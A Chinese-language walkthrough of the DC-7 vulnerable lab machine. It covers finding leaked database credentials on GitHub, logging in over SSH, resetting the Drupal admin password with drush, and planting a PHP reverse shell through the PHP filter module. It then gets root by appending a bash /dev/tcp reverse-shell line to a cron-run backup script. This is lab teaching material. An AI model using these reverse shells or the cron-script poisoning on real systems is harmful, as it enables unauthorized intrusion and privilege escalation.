太原网站制作哪家便宜,seo站长,燕郊建设局网站,阿里云虚拟主机wordpress前言
靶机#xff1a;DC-7#xff0c;IP地址为192.168.10.13
攻击#xff1a;kali#xff0c;IP地址为192.168.10.2
都采用VMWare#xff0c;网卡为桥接模式
对于文章中涉及到的靶场以及工具#xff0c;我放置在网盘中#xff0c;链接#xff1a;https://pan.quark…前言
靶机DC-7IP地址为192.168.10.13
攻击kaliIP地址为192.168.10.2
都采用VMWare网卡为桥接模式
对于文章中涉及到的靶场以及工具我放置在网盘中链接https://pan.quark.cn/s/203d4b01f3d7
主机发现
使用arp-scan -l或者netdiscover -r 192.168.10.1/24
因为是靶机所以在同一局域网中这里使用这两个工具是因为在同一局域网中的扫描速度很快
当然如果想要模拟真实渗透可以使用nmap等扫描工具 主机发现
使用arp-scan -l或者netdiscover -r 192.168.10.1/24
因为是靶机所以在同一局域网中这里使用这两个工具是因为在同一局域网中的扫描速度很快
当然如果想要模拟真实渗透建议使用nmap等扫描工具 网站信息探测
访问80端口默认界面发现这个CMS之前见过是drupal不过这里给出的话有点东西下面翻译看看 把这段话翻译然后以图片来看应该更直观 使用whatweb进一步确定drupal是否正确
whatweb http://192.168.10.13这里看到是drupal 8在之前的DC-1靶场中是drupal 7版本然后通过msf进行的攻击
但是这里不行按照提示虽然进行爆破没有什么用但是还是进行一下目录扫描不过这次感觉东西是真多之前并未出现这种情况感觉是作者为了再次的提醒一样这里放一张图吧是放在那里进行好久的目录爆破 漏洞寻找
再使用burp等工具尝试对登录进行一个爆破发现若长时间的爆破会使得其进行了限制注意这里是对账号进行的限制 尝试获取js代码测试有无这方面的但是发现基本上都是调用外部js无用处
在发现的搜索处进行各种注入测试发现也是不行使用sqlmap测试发现也是不行 抓取每个请求的数据包发现也是无内容那么尝试搜搜看能否有源码之类的泄露尝试直接搜索drupal 8但是想到这里都是纯净的原始状态除非进行代码审计去把其中的代码进行分析然后找出漏洞
啧再找找。在网站的底部发现一串字符想来平常这种位置一般也是邮箱偏多这种形式还真是少见的尝试对这个进行搜索DC7USER 源码泄露
因为靶机属于国外的作者所制作所以这里建议采用google进行搜索可以明确的看到在github有项目 查看该项目可以看到readme文件给出了方向说明找对了方向 在众多代码中我们要么就是进行代码审计要么就是寻找配置文件
查看config.php文件发现关键信息项目地址https://github.com/Dc7User/staffdb/blob/master/config.php 连接数据库的用户名dc7user和密码MdR3xOgB7#dW
那么在之前端口扫描的时候并未发现数据库相关的服务端口是开放的那么就猜测这个用户名和密码可能是多用的尝试以这一组身份信息登录网站
不过这里还是登录不了网站啧既然是登录就不应该如此说明这一组不是网站的
还有ssh服务尝试进行登录登录成功 提权点寻找
查看当前目录下的文件mbox发现好多信息 到备份数据库数据的目录下查看发现数据大小为0 那么查看其中的备份脚本看以所属者和所属组以及脚本内容好家伙是gpg加密但是文件无内容并且尝试解密也是只有gpg: decrypt_message failed: Unknown system error
并且这个脚本所属组是www-data加入脚本可以修改或者使用临时环境变量也都无法提权至root 错误的提权
使用find寻找具有SUID权限文件发现一个文件是不是很眼熟这里在前面的DC-4靶机一样
find / -perm -4000 -print 2/dev/null这里与前面的mbox文件中的信息提到的一样还是再确定一下版本
/usr/sbin/exim4 --version在kali中使用searchsploit搜索对应的版本漏洞并复制到当前目录下 如果忘了用法这里再查看这个脚本即可脚本文件名加上后面两种即可 然后把这个脚本上传到靶机可以使用python配合wget或者直接使用scp因为这里是以ssh连接
scp ./46996.sh dc7user192.168.10.13:/tmp这里还可以看到该脚本具有执行权限直接执行但是发现不行 正确的提权方向
那么只能再次回到备份文件脚本的问题也就是/opt/scripts/backups.sh
因为当前用户dc7user还不属于www-data组也就是说两个办法要不切换到www-data要不就是root
对于现在的情况来说只能切换到www-data
这里我在/var/www/html中找到配置文件settings.php发现其中连接数据库的账号与密码 但是连接数据库后发现这里面只是记录网站访问等一些信息并没有用户信息保存在这里
回头查看/opt/scripts/backups.sh脚本发现这里除了gpg无用还有一个命令没接触过drush
使用AI搜索一下 Drush 是 Drupal 的配套工具 Drupal 是一个功能强大的内容管理系统CMS用于构建和管理网站。它提供了丰富的网站构建模块、主题系统、用户管理、内容发布等功能。然而在实际的网站管理和开发过程中仅仅通过 Drupal 的图形界面来操作可能会比较繁琐。当 Drush 是通过 Composer 在项目本地安装时它通常位于项目的vendor/bin/目录下。例如如果你的 Drupal 项目位于/var/www/drupal_project/并且通过 Composer 安装了 Drush那么 Drush 可执行文件可能位于/var/www/drupal_project/vendor/bin/drush 这里列出drush的增、删、改、查的操作
#增操作
drush user-create [new_user_name] --mail[user_email] --password[user_password]
#其中[new_user_name]是新用户的用户名--mail选项用于指定用户的电子邮件地址--password选项用于指定用户的密码。#删操作
drush user-cancel [user_name]#改操作
drush user-password [user_name] -password[new_password]
#其中[user_name]是要更改密码的用户名[new_password]是新密码。#查操作
drush user-list
#列出用户情况我这里因为执行命令时出现错误把admin删除了所以这里重装靶机唉不过IP地址没有变
这里测试后发现只有改和删的操作是可以的
drush user-password admin --password123登录网站为什么因为根据备份文件要获取www-data的身份
经过测试发现并没有可利用点不过这里可以安装模块因为网站当前身份是admin
在extend中尝试安装一些模块当然这里可以访问其官方网站然后通过这里去下载
图中蓝色超链接的标志这里提供官网模块地址访问后可以直接搜索寻找
https://www.drupal.org/project/project_module但是这里我原本打算把模块文件下载到kali中然后修改其中的内容但是发现本地无法上传成功不管有无修改这个方式都不行 获取www-data的反弹1shell
只能采取第一种方式链接下载这里的地址在输入框下面已经给出提示了
For example: https://ftp.drupal.org/files/projects/name.tar.gz既然无法修改那么就安装php模块因为搜索发现在8版本中取消了这个所以需要自己主动安装。
可以先访问下面的链接地址来确定当前版本可支持使用的php
https://www.drupal.org/project/php/releases/8.x-1.0然后构造链接从URL下载
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz然后在扩展列表界面下滑找到php filter把这个勾选上然后再下滑到最后点击install 成功启动 打开一个文章然后对其进行编辑可以发现可以更改其为php代码的形式 那么新建一个文章然后使用php格式然后进行保存
?php
exec(/bin/bash -c bash -i /dev/tcp/192.168.10.2/9999 01);
//system($_REQUEST[cmd]); //用于测试使用
?当然在执行上面的反弹shell时需要先在kali中开启监听
nc -lvvp 9999获取到www-data的bash 提权至root
然后在该脚本的末尾加入反弹shell代码不过需要在kali另起终端监听8888端口
echo /bin/bash -c bash -i /dev/tcp/192.168.10.2/8888 01 backups.sh如果这条命令不行就可以在https://forum.ywhack.com/shell.php测试合适的添加就是了 查看flag 这里补充说一下对于脚本backups.sh修改后不要执行一旦执行是以当前用户的身份也就是www-data执行的是无法提权的。 这里我忘了放图了在前面我是借助工具pspy64获取到backups.sh会以root身份执行只是时间间隔有点大所以当时没有截图 该工具项目地址https://github.com/DominicBreuker/pspy/releases 总结
该靶场考察以下几点
对于信息收集时源码泄露能否会寻找这里是通过一个作者名搜索到gihub的项目对于提权时发现的东西都要去试一试这里先测试exim4不行后再下手脚本文件对于脚本文件的所属者和所属组要搞清楚这里dc7user不属于www-data组所以还需要获取www-data用户的反弹shell那么就需要从网站下手对于drush和drupal是配合使用的所以简单了解drush的增删改查即可drupal 8下载扩展模块可以自己选择不过出于安全版本8没有php所以可以安装php通过php中的函数可执行命令来获取www-data是shell通过pspy64观察有root执行的定时任务并且是脚本backups.sh用户www-data可修改。获取到www-data的bash后就可以修改文件添加反弹shell的命令等待root去执行这个定时任务触发脚本中的反弹shell代码
